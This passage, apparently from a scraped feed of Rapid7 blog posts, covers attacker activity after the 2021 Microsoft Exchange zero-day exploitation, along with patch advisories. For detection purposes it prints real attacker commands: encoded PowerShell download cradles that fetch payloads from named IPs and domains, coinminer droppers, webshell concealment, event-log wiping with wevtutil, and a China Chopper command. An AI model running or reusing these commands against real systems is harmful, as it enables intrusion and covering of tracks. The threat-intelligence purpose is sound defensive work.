KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA\n msiexec.exe -k\n powershell Start-Sleep -Seconds 10\n cmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\opera\\opera_browser.png')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\opera\\opera_browser.dll')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\opera\\opera_browser.exe')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Download And Execute With Background Intelligent Transfer Service\n * Attacker Technique - URL Passed To BitsAdmin\n\n### Six-character webshell attacker\n\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\n \n \n cmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_6_CHARACTER_STRING>.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Encoded PowerShell download cradle attacker\n\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. The would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.\n \n \n cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==\n C:\\Windows\\system32\\getmac.exe /FO CSV\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - PowerShell Download Cradles\n\n### Ten-character webshell attacker\n\nThis attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be read-only recursively. Additionally, the attacker would use the attrib.exe utility to set the file containing the webshell to be marked as hidden and system to make finding these more difficult.\n \n \n C:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\error.aspx\" \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\"\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n C:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Modification Of Files In Exchange Webroot\n\n### 7zip and NetSupport Manager attacker\n\nThis attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:\n \n \n c:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\n c:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\n powershell C:\\Programdata\\script1.ps1\n C:\\ProgramData\\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramData\n ping -n 10 127.0.0.1\n c:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\n taskkill /Im rundll32.exe /F\n C:\\ProgramData\\NetConnections\\client32.exe\n ping -n 10 127.0.0.1\n taskkill /Im rundll32.exe /F\n c:\\windows\\system32\\cmd.exe /c tasklist /v\n tasklist /v\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Event log deletion and virtual directory creation attacker\n\nThis attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using [wevtutl.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):\n \n \n CMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /physicalPath:C:\\ProgramData\\COM\\zfwqn\n \n CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\n wevtutil el\n wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Clearing Event Logs With WEvtUtil\n\n### Webshell enumeration attacker\n\nThis attacker was seen executing encoded PowerShell commands to use the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command to view the contents possible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:\n \n \n cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA\n cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA\n \n\nBase64 decoded strings:\n \n \n type \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Coinminer dropper attacker\n\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nAnd again with a slightly different filename to retrieved from:\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Simple reconnaissance attacker(s)\n\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\n \n \n net group /domain\n net group \"Domain Computers\" /do\n net group \"Domain Users\" /do\n net group IntranetAdmins /do\n net user /domain\n systeminfo\n tasklist\n \n\nAnother example where only simple recon type commands were executed:\n \n \n whoami\n systeminfo\n systeminfo\n wmic product get name\n Wmic product get name\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n## Conclusions\n\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 did even observe exploitation of the same victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services as long as those credentials gathered remain unchanged. \n\nThis dumping of credentials may have been done at this scale as the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**\n\nBy continuing to analyze the behavior of attackers post-compromise to develop detections, it can greatly increase the likelihood to be notified of a breach. This is regardless of the method used to obtain the initial access to the victim environment. Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.\n\n### Observed CVEs employed by attackers: \n\n\nCommon Vulnerabilities and Exposure | Description \n---|--- \nCVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html> \nCVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855> \nCVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857> \nCVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858> \nCVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \n \n### Observed IOCs employed by all attackers:\n\nType | Value \n---|--- \nFQDN | estonine.com \nFQDN | p.estonine.com \nFQDN | ipinfo.io \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\ \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\ \nFilepath | c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\ \nFilepath | C:\\Programdata\\ \nFilepath | C:\\ProgramData\\COM\\zfwqn\\ \nFilepath | C:\\root\\ \nFilepath | C:\\Users\\Public\\ \nFilepath | C:\\Users\\Public\\Opera\\ \nFilepath | C:\\Windows\\temp\\ \nFilename | 1.txt \nFilename | 2.bat \nFilename | 3.avi \nFilename | b.log \nFilename | c103w-at.zip \nFilename | client32.exe \nFilename | code \nFilename | curl.exe \nFilename | demo.dll \nFilename | discover.aspx \nFilename | dsf.exe \nFilename | error.aspx \nFilename | ErrorFF.aspx \nFilename | exshell.psc1 \nFilename | Flogon.aspx \nFilename | lsass.dump \nFilename | m103w.zip \nFilename | nvidia.msi \nFilename | opera_browser.dll \nFilename | opera_browser.exe \nFilename | opera_browser.png \nFilename | OutlookEN.aspx \nFilename | MonitoringLog.cmd \nFilename | MonitoringLog.exe \nFilename | p \nFilename | procdump64.exe \nFilename | Service.Information.rtf \nFilename | TimeoutLogout.aspx \nFilename | 2.bat \nFilename | script1.ps1 \nFilename | test.bat \nIP Address | 178.162.217.107 \nIP Address | 178.162.203.202 \nIP Address | 178.162.203.226 \nIP Address | 85.17.31.122 \nIP Address | 5.79.71.205 \nIP Address | 5.79.71.225 \nIP Address | 178.162.203.211 \nIP Address | 85.17.31.82 \nIP Address | 86.105.18.116 \nIP Address | 198.98.61.152 \nIP Address | 89.34.111.11 \nMD5 | 7a6c605af4b85954f62f35d648d532bf \nMD5 | e1ae154461096adb5ec602faad42b72e \nMD5 | b3df7f5a9e36f01d0eb0043b698a6c06 \nMD5 | c60ac6a6e6e582ab0ecb1fdbd607705b \nMD5 | 42badc1d2f03a8b1e4875740d3d49336 \nMD5 | c515107d75563890020e915f54f3e036 \nSHA1 | 02886f9daa13f7d9855855048c54f1d6b1231b0a \nSHA1 | c7f68a184df65e72c59403fb135924334f8c0ebd \nSHA1 | ab32d4ec424b7cd30c7ace1dad859df1a65aa50e \nSHA1 | ba9de479beb82fd97bbdfbc04ef22e08224724ba \nSHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 \nSHA1 | 2fed891610b9a770e396ced4ef3b0b6c55177305 \nSHA-256 | b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff \nSHA-256 | d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09 \nSHA-256 | bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6 \nSHA-256 | 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87 \nSHA-256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf \nSHA-256 | 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26 \nURL | `http://103.212.223.210:9900/nvidia.msi` \nURL | `http://86.105.18.116/news/code` \nURL | `http://86.105.18.116/news/opera_browser.dll` \nURL | `http://86.105.18.116/news/opera_browser.exe` \nURL | `http://86.105.18.116/news/opera_browser.png` \nURL | ` http://89.34.111.11/3.avi` \nURL | `http://microsoftsoftwaredownload.com:8080/c103w-at.zip` \nURL | `http://microsoftsoftwaredownload.com:8080/m103w.zip` \nURL | `http://p.estonine.com/p?e` \nURL | http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn \nURL | http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn \n \n### References:\n\n * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * <https://aka.ms/ExchangeVulns>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>\n * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-23T14:04:36", "type": "rapid7blog", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-18913", "CVE-2019-19781", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-23T14:04:36", "id": "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "href": "https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nOn March 2, 2021, the Microsoft Threat Intelligence Center (MSTIC) [released details on an active state-sponsored threat campaign](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group \u201cassessed to be state-sponsored and operating out of China.\u201d\n\nRapid7 detection and response teams [have also observed increased threat activity](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>) against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers **should apply the latest updates on an emergency basis** and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of [IOCs available here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>).\n\nThe actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:\n\n * **[CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)**, also known as [Proxylogon](<https://proxylogon.com/>), is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." More information and a disclosure timeline are available at <https://proxylogon.com>.\n * **[CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n * **[CVE-2021-26857](<https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857?referrer=blog>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n * **[CVE-2021-26858](<https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\nAlso included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:\n\n * **[CVE-2021-26412](<https://attackerkb.com/topics/mgKIUMCadN/cve-2021-27078?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n * **[CVE-2021-26854](<https://attackerkb.com/topics/KxXhEt74SK/cve-2021-26412?referrer=blog>)** (CVSS:3.0 6.6 / 5.8)\n * **[CVE-2021-27078](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n\nMicrosoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021. Security updates are available for the following specific versions of Exchange:\n\n * Exchange Server 2010 (for Service Pack 3\u2014this is a Defense in Depth update)\n * Exchange Server 2013 (CU 23)\n * Exchange Server 2016 (CU 19, CU 18)\n * Exchange Server 2019 (CU 8, CU 7)\n\nExchange Online is not affected.\n\n## For Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.\n\nInsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, [install the Insight Agent](<https://docs.rapid7.com/insight-agent/install/>) on your Exchange Servers.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=blog#rapid7-analysis>).\n\n## Updates\n\n**Update March 18, 2021:** Microsoft has released a "One-Click Exchange On-premises Mitigation Tool" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended "to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 15, 2021:** There are now multiple reports of [ransomware](<https://twitter.com/phillip_misner/status/1370197696280027136>) being used after initial compromise of unpatched Exchange servers. Microsoft [has confirmed](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) that it is detecting and blocking a new ransomware strain it calls DearCry. On-premises Exchange customers should continue to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 7, 2021:** Widespread [exploitation and compromise](<https://twitter.com/GossiTheDog/status/1366894548593573893>) of Exchange servers is ongoing. CISA, the U.S. Cybersecurity and Infrastructure Agency, [said on March 6, 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that they are "aware of widespread domestic and international exploitation of these vulnerabilities." Microsoft has [published a script](<https://github.com/microsoft/CSS-Exchange/blob/cb550e399bc2785e958472e533147826e2b6bf24/Security/Test-ProxyLogon.ps1>) to help identify some vulnerable versions of Exchange. Because there is [some potential for false negatives](<https://github.com/microsoft/CSS-Exchange/issues/107>), we recommend using this script as a supporting tool rather than as a primary way of confirming vulnerability. Defenders should check the version of Exchange they're running and compare against the known vulnerable versions Microsoft has identified. (Those running older, unsupported versions of Exchange should consider updating as a best practice.)\n\nOn-premises Exchange administrators should continue to treat this widespread threat as an incident response scenario and examine their environments for signs of compromise. Rapid7 has [a list of IOCs here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>), which we will continue to update as new information becomes available. Microsoft has also released [an updated script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that scans Exchange log files for IOCs associated with the vulnerabilities disclosed on March 2, 2021.", "cvss3": {}, "published": "2021-03-03T19:23:42", "type": "rapid7blog", "title": "Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T19:23:42", "id": "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "href": "https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-02T21:07:58", "description": "\n\n_The following blog post was co-authored by Andrew Christian and Brendan Watters._\n\nBeginning Feb. 27, 2021, [Rapid7\u2019s Managed Detection and Response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) team has observed a notable increase in the automated exploitation of vulnerable Microsoft Exchange servers to upload a webshell granting attackers remote access. The suspected vulnerability being exploited is a [cross-site request forgery (CSRF) vulnerability](<https://www.rapid7.com/fundamentals/cross-site-request-forgery/>): The likeliest culprit is [CVE-2021-24085](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24085>), an Exchange Server spoofing vulnerability released as part of Microsoft\u2019s February 2021 Patch Tuesday advisory, though other CVEs may also be at play (e.g., CVE-2021-26855, CVE-2021-26865, CVE-2021-26857).\n\nThe following China Chopper command was observed multiple times beginning Feb. 27 using the same DigitalOcean source IP (165.232.154.116):\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nExchange or other systems administrators who see this command\u2014or any other China Chopper command in the near future\u2014should look for the following in IIS logs:\n\n * 165.232.154.116 (the source IP of the requests)\n * `/ecp/y.js`\n * `/ecp/DDI/DDIService.svc/GetList`\n\nIndicators of compromise (IOCs) from the attacks we have observed are consistent with IOCs for [publicly available exploit code targeting CVE-2021-24085](<https://github.com/sourceincite/CVE-2021-24085>) released by security researcher [Steven Seeley](<https://twitter.com/steventseeley>) last week, shortly before indiscriminate exploitation began. After initial exploitation, attackers drop an ASP eval webshell before (usually) executing `procdump` against `lsass.exe` in order to grab all the credentials from the box. It would also be possible to then clean some indicators of compromise from the affected machine[s]. We have included a section on CVE-2021-24085 exploitation at the end of this document.\n\nExchange servers are frequent, [high-value attack targets](<https://attackerkb.com/search?q=exchange>) whose patch rates often [lag behind attacker capabilities](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>). Rapid7 Labs has identified nearly 170,000 Exchange servers vulnerable to CVE-2021-24085 on the public internet:\n\n\n\n**Rapid7 recommends that Exchange customers apply Microsoft\u2019s February 2021 updates immediately.** InsightVM and Nexpose customers can [assess their exposure to CVE-2021-24085](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-24085/>) and other February Patch Tuesday CVEs with vulnerability checks. InsightIDR provides existing coverage for this vulnerability via our out-of-the-box China Chopper Webshell Executing Commands detection, and will alert you about any suspicious activity. [View this detection](<https://docs.rapid7.com/insightidr/windows-suspicious-process/#attacker-tool>) in the Attacker Tool section of the InsightIDR Detection Library.\n\n## CVE-2021-24085 exploit chain\n\nAs part of the [PoC](<https://github.com/sourceincite/CVE-2021-24085>) for CVE-2021-24085, the attacker will search for a specific token using a request to `/ecp/DDI/DDIService.svc/GetList`. If that request is successful, the PoC moves on to writing the desired token to the server\u2019s filesystem with the request `/ecp/DDI/DDIService.svc/SetObject`. At that point, the token is available for downloading directly. The PoC uses a download request to `/ecp/poc.png` (though the name could be anything) and may be recorded in the IIS logs themselves attached to the IP of the initial attack.\n\nIndicators of compromise would include the requests to both `/ecp/DDI/DDIService.svc/GetList` and `/ecp/DDI/DDIService.svc/SetObject`, especially if those requests were associated with an odd user agent string like `python`. Because the PoC utilizes aSetObject to write the token o the server\u2019s filesystem in a world-readable location, it would be beneficial for incident responders to examine any files that were created around the time of the requests, as one of those files could be the access token and should be removed or placed in a secure location. It is also possible that responders could discover the file name in question by checking to see if the original attacker\u2019s IP 